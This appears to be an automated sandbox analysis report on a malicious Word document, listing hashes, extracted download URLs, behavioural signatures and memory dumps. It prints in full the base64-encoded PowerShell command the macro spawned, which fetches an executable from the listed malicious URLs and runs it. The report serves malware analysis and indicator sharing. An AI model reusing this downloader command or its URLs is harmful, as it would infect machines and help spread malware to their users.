Analysis
-
max time kernel
123s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
25-04-2022 02:23
Static task
static1
Behavioral task
behavioral1
Sample
ldkkvaxp.doc
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
ldkkvaxp.doc
Resource
win10v2004-20220414-en
General
-
Target
ldkkvaxp.doc
-
Size
169KB
-
MD5
9bcd7831593b18eb2fc20abb950776e0
-
SHA1
94fce0e45271cd1dc5ff594f886146c88b5bdf75
-
SHA256
2e480d827237d7ae78d5b296e18e6a0cd466c5f3e09abf96f8bb53d927c4bab8
-
SHA512
ce5e923278b315e334274b0b1f9434aaa2851135fb0fb4f147b8e123da1f595e50a70fc47079f8f3c8c5c6a43f9b5b04a5dbf799f29491bb73d716304892dfdc
Malware Config
Extracted
http://sampling-group.com/J0Eubtq06/
http://www.weddingsday.co.uk/docs/1oYncTNHDu/
http://sasystemsuk.com/recruit/sl979/
http://wellparts.net/cgi-bin/qAj081/
http://volkanakbalik.com/_inc/2W/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4956 4356 powersheLL.exe -
Blocklisted process makes network request 5 IoCs
Processes:
powersheLL.exeflow pid process 25 4956 powersheLL.exe 26 4956 powersheLL.exe 30 4956 powersheLL.exe 32 4956 powersheLL.exe 35 4956 powersheLL.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4152 WINWORD.EXE 4152 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powersheLL.exepid process 4956 powersheLL.exe 4956 powersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 4956 powersheLL.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 4152 WINWORD.EXE 4152 WINWORD.EXE 4152 WINWORD.EXE 4152 WINWORD.EXE 4152 WINWORD.EXE 4152 WINWORD.EXE 4152 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ldkkvaxp.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABHAEQAWgBBAFoAeABwAGgAPQAnAFAATABKAFMAUQBtAGIAdgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABDAHUAUgBpAHQAWQBQAGAAUgBvAHQAbwBjAGAATwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQATgBXAEIATABGAHoAcgBnACAAPQAgACcAOAA0ADgAJwA7ACQAWgBFAEgARwBMAHQAbAB3AD0AJwBSAEsAWQBBAEkAeAB5AHcAJwA7ACQAWgBVAEMASwBYAGQAaQBmAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABOAFcAQgBMAEYAegByAGcAKwAnAC4AZQB4AGUAJwA7ACQAWgBWAEYAVQBRAHoAdAB1AD0AJwBWAEYATwBKAEsAZABhAGcAJwA7ACQARABZAFQAVgBNAHMAdQBxAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlAGMAJwArACcAdAAnACkAIABuAGUAVAAuAHcAZQBiAEMATABpAGUAbgBUADsAJABKAEMASwBQAFEAegB6AHMAPQAnAGgAdAB0AHAAOgAvAC8AcwBhAG0AcABsAGkAbgBnAC0AZwByAG8AdQBwAC4AYwBvAG0ALwBKADAARQB1AGIAdABxADAANgAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHcAZQBkAGQAaQBuAGcAcwBkAGEAeQAuAGMAbwAuAHUAawAvAGQAbwBjAHMALwAxAG8AWQBuAGMAVABOAEgARAB1AC8AKgBoAHQAdABwADoALwAvAHMAYQBzAHkAcwB0AGUAbQBzAHUAawAuAGMAbwBtAC8AcgBlAGMAcgB1AGkAdAAvAHMAbAA5ADcAOQAvACoAaAB0AHQAcAA6AC8ALwB3AGUAbABsAHAAYQByAHQAcwAuAG4AZQB0AC8AYwBnAGkALQBiAGkAbgAvAHEAQQBqADAAOAAxAC8AKgBoAHQAdABwADoALwAvAHYAbwBsAGsAYQBuAGEAawBiAGEAbABpAGsALgBjAG8AbQAvAF8AaQBuAGMALwAyAFcALwAnAC4AIgBzAHAAYABMAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFkAVwBPAEgATgBiAHYAcAA9ACcAUgBLAEIAVQBTAHEAagB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABDAFAAWABSAE8AYQBlAHoAIABpAG4AIAAkAEoAQwBLAFAAUQB6AHoAcwApAHsAdAByAHkAewAkAEQAWQBUAFYATQBzAHUAcQAuACIAZABPAGAAdwBOAEwATwBhAGAAZABGAEkATABFACIAKAAkAEMAUABYAFIATwBhAGUAegAsACAAJABaAFUAQwBLAFgAZABpAGYAKQA7ACQATABFAE8ASQBOAHEAdgBxAD0AJwBGAEgAWgBWAFoAYgBhAHoAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACAAJABaAFUAQwBLAFgAZABpAGYAKQAuACIAbABFAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADkAOQA1ADYAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAYABSAGUAYABBAHQARQAiACgAJABaAFUAQwBLAFgAZABpAGYAKQA7ACQAUwBIAEQAWQBBAGYAYgBqAD0AJwBBAE4AWABaAE8AYwBvAGIAJwA7AGIAcgBlAGEAawA7ACQAUQBJAFgATABYAGsAcQBoAD0AJwBXAEwAWgBVAFMAcQBnAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASQBHAE8AQwBNAGgAegBwAD0AJwBIAEkATABTAEwAegBxAGoAJwA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/4152-141-0x00007FFB82E50000-0x00007FFB82E60000-memory.dmpFilesize
64KB
-
memory/4152-132-0x00007FFB82E50000-0x00007FFB82E60000-memory.dmpFilesize
64KB
-
memory/4152-131-0x00007FFB82E50000-0x00007FFB82E60000-memory.dmpFilesize
64KB
-
memory/4152-133-0x00007FFB82E50000-0x00007FFB82E60000-memory.dmpFilesize
64KB
-
memory/4152-134-0x00007FFB82E50000-0x00007FFB82E60000-memory.dmpFilesize
64KB
-
memory/4152-135-0x0000022247500000-0x0000022247504000-memory.dmpFilesize
16KB
-
memory/4152-130-0x00007FFB82E50000-0x00007FFB82E60000-memory.dmpFilesize
64KB
-
memory/4152-144-0x00007FFB82E50000-0x00007FFB82E60000-memory.dmpFilesize
64KB
-
memory/4152-143-0x00007FFB82E50000-0x00007FFB82E60000-memory.dmpFilesize
64KB
-
memory/4152-142-0x00007FFB82E50000-0x00007FFB82E60000-memory.dmpFilesize
64KB
-
memory/4956-136-0x00000253568B0000-0x00000253568D2000-memory.dmpFilesize
136KB
-
memory/4956-140-0x0000025356936000-0x0000025356938000-memory.dmpFilesize
8KB
-
memory/4956-138-0x0000025356930000-0x0000025356932000-memory.dmpFilesize
8KB
-
memory/4956-139-0x0000025356933000-0x0000025356935000-memory.dmpFilesize
8KB
-
memory/4956-137-0x00007FFB973B0000-0x00007FFB97E71000-memory.dmpFilesize
10.8MB